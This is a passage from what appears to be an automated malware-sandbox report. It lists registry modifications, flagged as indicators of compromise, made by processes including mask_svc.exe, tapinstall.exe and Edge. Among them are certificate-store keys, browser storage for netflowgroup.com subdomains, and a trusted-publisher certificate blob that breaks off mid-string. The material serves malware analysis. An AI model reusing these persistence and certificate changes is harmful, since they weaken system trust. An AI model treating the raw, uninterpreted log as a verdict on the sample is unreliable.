Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-492 = "India Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-571 = "China Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" csrss.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 763c215b7f11d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\tolerant.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{17B847AA-2793-4FD2-9192-CB098182252B} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\report.netflowgroup.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\prospect.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\information.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\news.netflowgroup.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\news.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\material.netflowgroup.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "58" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\statement.netflowgroup.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\addicted.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\addicted.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\priority.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{B3D6F9F8-F575-4B54-B6D2-06752AF07F73} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 44457a797f11d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\LastProcessed = f0c25c8b7f11d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\message.netflowgroup.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\declaration.netflowgroup.c = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "64" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "82" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\news.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\marathon.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\memo.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\dominate.netflowgroup.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info\ = "18" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\struggle.netflowgroup.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\discreet.netflowgroup.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "6" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "29" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\reaction.netflowgroup.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\decrease.netflowgroup.com MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = a00973797f11d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "28" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe -
Processes:
vpn.tmptapinstall.exeSetup.exefile.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e